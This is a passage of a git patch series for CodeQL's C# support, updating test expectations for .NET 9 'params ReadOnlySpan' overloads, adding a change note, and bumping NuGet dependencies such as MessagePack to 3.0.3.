args | | Debug | WriteLine(string, params Object[]) | args | -| StringBuilder | AppendFormat(IFormatProvider, string, ReadOnlySpan) | args | | StringBuilder | AppendFormat(IFormatProvider, string, object) | arg0 | | StringBuilder | AppendFormat(IFormatProvider, string, object, object) | arg0 | | StringBuilder | AppendFormat(IFormatProvider, string, object, object) | arg1 | @@ -25,7 +24,7 @@ | StringBuilder | AppendFormat(IFormatProvider, string, object, object, object) | arg1 | | StringBuilder | AppendFormat(IFormatProvider, string, object, object, object) | arg2 | | StringBuilder | AppendFormat(IFormatProvider, string, params Object[]) | args | -| StringBuilder | AppendFormat(string, ReadOnlySpan) | args | +| StringBuilder | AppendFormat(IFormatProvider, string, params ReadOnlySpan) | args | | StringBuilder | AppendFormat(string, object) | arg0 | | StringBuilder | AppendFormat(string, object, object) | arg0 | | StringBuilder | AppendFormat(string, object, object) | arg1 | @@ -33,8 +32,8 @@ | StringBuilder | AppendFormat(string, object, object, object) | arg1 | | StringBuilder | AppendFormat(string, object, object, object) | arg2 | | StringBuilder | AppendFormat(string, params Object[]) | args | +| StringBuilder | AppendFormat(string, params ReadOnlySpan) | args | | Strings | MyStringFormat(string, params Object[]) | args | -| TextWriter | Write(string, ReadOnlySpan) | arg | | TextWriter | Write(string, object) | arg0 | | TextWriter | Write(string, object, object) | arg0 | | TextWriter | Write(string, object, object) | arg1 | @@ -42,7 +41,7 @@ | TextWriter | Write(string, object, object, object) | arg1 | | TextWriter | Write(string, object, object, object) | arg2 | | TextWriter | Write(string, params Object[]) | arg | -| TextWriter | WriteLine(string, ReadOnlySpan) | arg | +| TextWriter | Write(string, params ReadOnlySpan) | arg | | TextWriter | WriteLine(string, object) | arg0 | | TextWriter | WriteLine(string, object, object) | arg0 | | TextWriter | WriteLine(string, object, object) | arg1 | @@ -50,7 +49,7 @@ | TextWriter | WriteLine(string, object, object, object) | arg1 | | TextWriter | WriteLine(string, object, object, object) | arg2 | | TextWriter | WriteLine(string, params Object[]) | arg | -| string | Format(IFormatProvider, string, ReadOnlySpan) | args | +| TextWriter | WriteLine(string, params ReadOnlySpan) | arg | | string | Format(IFormatProvider, string, object) | arg0 | | string | Format(IFormatProvider, string, object, object) | arg0 | | string | Format(IFormatProvider, string, object, object) | arg1 | @@ -58,7 +57,7 @@ | string | Format(IFormatProvider, string, object, object, object) | arg1 | | string | Format(IFormatProvider, string, object, object, object) | arg2 | | string | Format(IFormatProvider, string, params Object[]) | args | -| string | Format(string, ReadOnlySpan) | args | +| string | Format(IFormatProvider, string, params ReadOnlySpan) | args | | string | Format(string, object) | arg0 | | string | Format(string, object, object) | arg0 | | string | Format(string, object, object) | arg1 | @@ -66,3 +65,4 @@ | string | Format(string, object, object, object) | arg1 | | string | Format(string, object, object, object) | arg2 | | string | Format(string, params Object[]) | args | +| string | Format(string, params ReadOnlySpan) | args | From f94aaee53cc768cd3910da2aee461a9a7a6f1400 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 16:11:46 +0100 Subject: [PATCH 0877/1267] C#: Update integration tests expected output. --- .../Assemblies.expected | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected b/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected index 18cbc068ace..a706f914cd9 100644 --- a/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected +++ b/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected @@ -2,6 +2,7 @@ | [...]/csharp/tools/[...]/Humanizer.dll | | [...]/csharp/tools/[...]/MessagePack.Annotations.dll | | [...]/csharp/tools/[...]/MessagePack.dll | +| [...]/csharp/tools/[...]/Microsoft.Bcl.AsyncInterfaces.dll | | [...]/csharp/tools/[...]/Microsoft.Build.Framework.dll | | [...]/csharp/tools/[...]/Microsoft.Build.Utilities.Core.dll | | [...]/csharp/tools/[...]/Microsoft.Build.dll | @@ -18,7 +19,6 @@ | [...]/csharp/tools/[...]/Microsoft.VisualBasic.dll | | [...]/csharp/tools/[...]/Microsoft.Win32.Primitives.dll | | [...]/csharp/tools/[...]/Microsoft.Win32.Registry.dll | -| [...]/csharp/tools/[...]/Microsoft.Win32.SystemEvents.dll | | [...]/csharp/tools/[...]/Mono.Posix.NETStandard.dll | | [...]/csharp/tools/[...]/Newtonsoft.Json.dll | | [...]/csharp/tools/[...]/StructuredLogger.dll | @@ -58,7 +58,6 @@ | [...]/csharp/tools/[...]/System.Diagnostics.Tools.dll | | [...]/csharp/tools/[...]/System.Diagnostics.TraceSource.dll | | [...]/csharp/tools/[...]/System.Diagnostics.Tracing.dll | -| [...]/csharp/tools/[...]/System.Drawing.Common.dll | | [...]/csharp/tools/[...]/System.Drawing.Primitives.dll | | [...]/csharp/tools/[...]/System.Drawing.dll | | [...]/csharp/tools/[...]/System.Dynamic.Runtime.dll | @@ -155,7 +154,6 @@ | [...]/csharp/tools/[...]/System.Security.Cryptography.ProtectedData.dll | | [...]/csharp/tools/[...]/System.Security.Cryptography.X509Certificates.dll | | [...]/csharp/tools/[...]/System.Security.Cryptography.dll | -| [...]/csharp/tools/[...]/System.Security.Permissions.dll | | [...]/csharp/tools/[...]/System.Security.Principal.Windows.dll | | [...]/csharp/tools/[...]/System.Security.Principal.dll | | [...]/csharp/tools/[...]/System.Security.SecureString.dll | @@ -183,7 +181,6 @@ | [...]/csharp/tools/[...]/System.ValueTuple.dll | | [...]/csharp/tools/[...]/System.Web.HttpUtility.dll | | [...]/csharp/tools/[...]/System.Web.dll | -| [...]/csharp/tools/[...]/System.Windows.Extensions.dll | | [...]/csharp/tools/[...]/System.Windows.dll | | [...]/csharp/tools/[...]/System.Xml.Linq.dll | | [...]/csharp/tools/[...]/System.Xml.ReaderWriter.dll | From d83f2215f63cf473c8fe0c2dbbfb85afa97a0574 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 16:29:33 +0100 Subject: [PATCH 0878/1267] C#: Update Parameters test to only inspect parameters from source code. --- csharp/ql/test/library-tests/methods/Parameters4.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/ql/test/library-tests/methods/Parameters4.ql b/csharp/ql/test/library-tests/methods/Parameters4.ql index aa103547f86..832f6c1ea37 100644 --- a/csharp/ql/test/library-tests/methods/Parameters4.ql +++ b/csharp/ql/test/library-tests/methods/Parameters4.ql @@ -4,5 +4,5 @@ import csharp -where forall(Parameter p | p.isParams() | p.getType() instanceof ArrayType) +where forall(Parameter p | p.isParams() and p.fromSource() | p.getType() instanceof ArrayType) select 1 From b9253222a64867d7336cd3a58411e28e1c2eab39 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 16:42:23 +0100 Subject: [PATCH 0879/1267] C#: Add change-note. --- csharp/ql/lib/change-notes/2024-12-04-dotnet9.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2024-12-04-dotnet9.md diff --git a/csharp/ql/lib/change-notes/2024-12-04-dotnet9.md b/csharp/ql/lib/change-notes/2024-12-04-dotnet9.md new file mode 100644 index 00000000000..e166040e155 --- /dev/null +++ b/csharp/ql/lib/change-notes/2024-12-04-dotnet9.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The C# extractor now supports *basic* extraction of .NET 9 projects. There might be limited support for extraction of code using the new C# 13 language features. From af2234453bef919b66c604aa45d2a419b21402e0 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Dec 2024 09:10:55 +0100 Subject: [PATCH 0880/1267] C#: Update dependencies (binlog package needs to be updated). --- csharp/paket.lock | 12 +++++++----- csharp/paket.main.bzl | 7 ++++--- 2 files changed, 11 insertions(+), 8 deletions(-) diff --git a/csharp/paket.lock b/csharp/paket.lock index 8bfc5b1650e..1d8e48895b3 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock @@ -3,7 +3,7 @@ STRATEGY: MAX RESTRICTION: == net9.0 NUGET remote: https://api.nuget.org/v3/index.json - Basic.CompilerLog.Util (0.9.3) + Basic.CompilerLog.Util (0.9.4) MessagePack (>= 2.5.187) Microsoft.CodeAnalysis (>= 4.11) Microsoft.CodeAnalysis.CSharp (>= 4.11) @@ -12,10 +12,12 @@ NUGET MSBuild.StructuredLogger (>= 2.2.243) System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (2.5.192) - MessagePack.Annotations (>= 2.5.192) - Microsoft.NET.StringTools (>= 17.6.3) - MessagePack.Annotations (2.5.192) + MessagePack (3.0.3) + MessagePack.Annotations (>= 3.0.3) + MessagePackAnalyzer (>= 3.0.3) + Microsoft.NET.StringTools (>= 17.11.4) + MessagePack.Annotations (3.0.3) + MessagePackAnalyzer (3.0.3) Microsoft.Bcl.AsyncInterfaces (9.0) Microsoft.Build (17.12.6) Microsoft.Build.Framework (>= 17.12.6) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index fa79062ab44..4887b7c333f 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl @@ -7,10 +7,11 @@ def main(): nuget_repo( name = "paket.main", packages = [ - {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.3", "sha512": "sha512-hgu/4KttHz9bXOISmomz1uO4WidkXqBbSu4MjVgj3SeJ/bH4t+nkZ5qybpqpZJHf04hdXlyt/ux0OWv5/xEKRQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.4", "sha512": "sha512-VJMBSOOcdPD6ihA5k1gnVkDbH9GCABmx1055fFikEImT2dFp4yZhN7zMd8PW14tIb3BXIieP557n8xE+J2Y8Dw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "2.5.192", "sha512": "sha512-SnrwSQIKWfxcQvzE1TCUPvJ7A/44KFBDcmCc+YUDIq8QalCf0bGAjiBoAFewhJ81QuS5FsCNCOcKn+IURYlbAQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.192", "sha512": "sha512-pE/SD2N0+nDAU8BtTHqjyIhLM2L5Mb0NiO4hW0ybiv2I+BbK0JEaGtbKpeEmOvKT+5s2hds0gvk/GrAHhgcpdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "3.0.3", "sha512": "sha512-rFOP00M8dZRRVVjg11M79hU9lhMziIkmqIc9CQ9QhK0R+us1mmpuEGwvnFupqN4F3zYEEoAM36SAdVC+i+mw+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net6.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net7.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net8.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netcoreapp3.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "3.0.3", "sha512": 